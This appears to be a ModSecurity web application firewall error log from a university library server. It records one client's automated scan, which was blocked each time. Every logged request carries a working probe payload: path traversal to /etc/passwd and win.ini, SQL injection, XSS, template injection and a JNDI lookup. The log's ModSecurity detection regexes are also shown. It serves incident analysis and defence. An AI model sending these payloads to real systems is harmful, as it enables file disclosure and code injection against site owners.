[Tue Aug 29 11:44:48.459329 2023] [:error] [pid 2020] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:code. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:code: ../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/plus/carbuyaction.php"] [unique_id "ZO13wMCo-f0AAAfkzDYAAAAi"]
[Tue Aug 29 11:44:49.368538 2023] [:error] [pid 1870] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:redirect. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:redirect: ../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13wcCo-f0AAAdOefUAAAAS"]
[Tue Aug 29 11:44:50.483360 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page: ../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13wsCo-f0AAAfSWfIAAAAB"]
[Tue Aug 29 11:44:51.385514 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:url: ../../../../../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO13w8Co-f0AAAgzyQwAAAAF"]
[Tue Aug 29 11:44:51.471329 2023] [:error] [pid 2120] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../ found within ARGS:controller: ../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13w8Co-f0AAAhISOoAAAAH"]
[Tue Aug 29 11:44:53.538947 2023] [:error] [pid 1990] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fullPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fullPath: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/fileDownload"] [unique_id "ZO13xcCo-f0AAAfGagUAAAAT"]
[Tue Aug 29 11:44:56.428411 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:files[]. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:files[]: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php"] [unique_id "ZO13yMCo-f0AAAgzyRQAAAAF"]
[Tue Aug 29 11:45:00.878876 2023] [:error] [pid 2164] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: windows/win.ini\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zMCo-f0AAAh0rTYAAAAy"]
[Tue Aug 29 11:45:00.880550 2023] [:error] [pid 2167] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filePath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: :/// found within ARGS:filePath: file:///etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/portal/attachment_downloadByUrlAtt.action"] [unique_id "ZO13zMCo-f0AAAh3f58AAAA1"]
[Tue Aug 29 11:45:02.428749 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:view. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:view: ../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAfSWiQAAAAB"]
[Tue Aug 29 11:45:02.442013 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13zsCo-f0AAAg-pNEAAAAR"]
[Tue Aug 29 11:45:03.367534 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: \\x00 found within ARGS:page: etc/passwd\\x00"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAhpwOYAAAAm"]
[Tue Aug 29 11:45:03.399756 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//windows/win.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13z8Co-f0AAAe3@I0AAAAA"]
[Tue Aug 29 11:45:04.442238 2023] [:error] [pid 1975] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:page: ../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130MCo-f0AAAe3@JEAAAAA"]
[Tue Aug 29 11:45:05.379935 2023] [:error] [pid 2099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAgzySoAAAAF"]
[Tue Aug 29 11:45:05.382843 2023] [:error] [pid 2145] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ....//....// found within ARGS:page: ....//....//etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO130cCo-f0AAAhhcvkAAAAd"]
[Tue Aug 29 11:45:06.374471 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:{\\r\\n   "type":"read",\\r\\n   "mbean":"java.lang:type. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22,\\x0d\\x0a   \\x22 found within ARGS:{\\x5cr\\x5cn   \\x22type\\x22:\\x22read\\x22,\\x5cr\\x5cn   \\x22mbean\\x22:\\x22java.lang:type: Memory\\x22,\\x0d\\x0a   \\x22target\\x22:{\\x0d\\x0a      \\x22url\\x22:\\x22service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\\x22\\x0d\\x0a   }\\x0d\\x0a}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/jolokia/read/getDiagnosticOptions"] [unique_id "ZO130sCo-f0AAAdxUkQAAAAC"]
[Tue Aug 29 11:45:07.451315 2023] [:error] [pid 2107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:patron_only_image. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:patron_only_image: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO1308Co-f0AAAg7zHcAAAAJ"]
[Tue Aug 29 11:45:09.381635 2023] [:error] [pid 2155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:student_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: updatexml( found within ARGS:student_id: updatexml(0x23,concat(1,md5(999999999)),1)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/TransferredOutModal.php"] [unique_id "ZO131cCo-f0AAAhrqGUAAAAo"]
[Tue Aug 29 11:45:10.367080 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/opac_css/getgif.php"] [unique_id "ZO131sCo-f0AAAhuixQAAAAr"]
[Tue Aug 29 11:45:11.364865 2023] [:error] [pid 2124] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:chemin. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:chemin: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/pmb/opac_css/getgif.php"] [unique_id "ZO1318Co-f0AAAhMtWUAAAAM"]
[Tue Aug 29 11:45:12.359618 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:id: ../../Conf/config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO132MCo-f0AAAhT3wgAAAAD"]
[Tue Aug 29 11:45:13.425467 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )\\x0d\\x0a# found within ARGS:uid: ,chr(97)) or 1: print chr(121) chr(101) chr(115)\\x0d\\x0a#"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/audit/gui_detail_view.php"] [unique_id "ZO132cCo-f0AAAdQ3ywAAAAV"]
[Tue Aug 29 11:45:15.372946 2023] [:error] [pid 2152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:keys. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ))}{ found within ARGS:keys: {if:array_map(base_convert(27440799224,10,32),array(1))}{end if}\\x0d\\x0a"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/search/"] [unique_id "ZO1328Co-f0AAAhoHL0AAAAl"]
[Tue Aug 29 11:45:16.416099 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/src/read_body.php"] [unique_id "ZO133MCo-f0AAAh4DYIAAAA2"]
[Tue Aug 29 11:45:17.376744 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:mailbox. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:mailbox: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/src/download.php"] [unique_id "ZO133cCo-f0AAAh13vUAAAAz"]
[Tue Aug 29 11:45:17.411241 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO133cCo-f0AAAfSWjIAAAAB"]
[Tue Aug 29 11:45:19.373499 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:page: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1338Co-f0AAAdQ3zMAAAAV"]
[Tue Aug 29 11:45:20.406860 2023] [:error] [pid 2016] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:url. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:url: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php"] [unique_id "ZO134MCo-f0AAAfg78YAAAAe"]
[Tue Aug 29 11:45:23.364121 2023] [:error] [pid 2144] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dir. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x5c..\\x5c found within ARGS:dir: http\\x5c..\\x5cadmin\\x5clogin\\x5clogin_check.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/include/thumb.php"] [unique_id "ZO1348Co-f0AAAhgoHoAAAAb"]
[Tue Aug 29 11:45:23.393556 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZO1348Co-f0AAAhZRe8AAAAG"]
[Tue Aug 29 11:45:24.371928 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:script. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:script: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135MCo-f0AAAhxwnIAAAAv"]
[Tue Aug 29 11:45:25.358880 2023] [:error] [pid 2108] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO135cCo-f0AAAg8a9IAAAAK"]
[Tue Aug 29 11:45:25.380045 2023] [:error] [pid 2153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:layout. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:layout: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilibft.unla.ac.id"] [uri "/"] [unique_id "ZO135cCo-f0AAAhpwQoAAAAm"]
[Tue Aug 29 11:45:25.398852 2023] [:error] [pid 2161] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:style. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..././..././..././..././..././..././..././..././..././..././ found within ARGS:style: ..././..././..././..././..././..././..././..././..././..././etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/webmail/old/calendar/minimizer/index.php"] [unique_id "ZO135cCo-f0AAAhxwnUAAAAv"]
[Tue Aug 29 11:45:26.376628 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/log/view"] [unique_id "ZO135sCo-f0AAAh13wYAAAAz"]
[Tue Aug 29 11:45:27.400188 2023] [:error] [pid 2165] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/manage/log/view"] [unique_id "ZO1358Co-f0AAAh13wkAAAAz"]
[Tue Aug 29 11:45:28.418605 2023] [:error] [pid 2137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:base. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:base: ../../../../../../../../../../"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilibft.unla.ac.id"] [uri "/log/view"] [unique_id "ZO136MCo-f0AAAhZRfMAAAAG"]
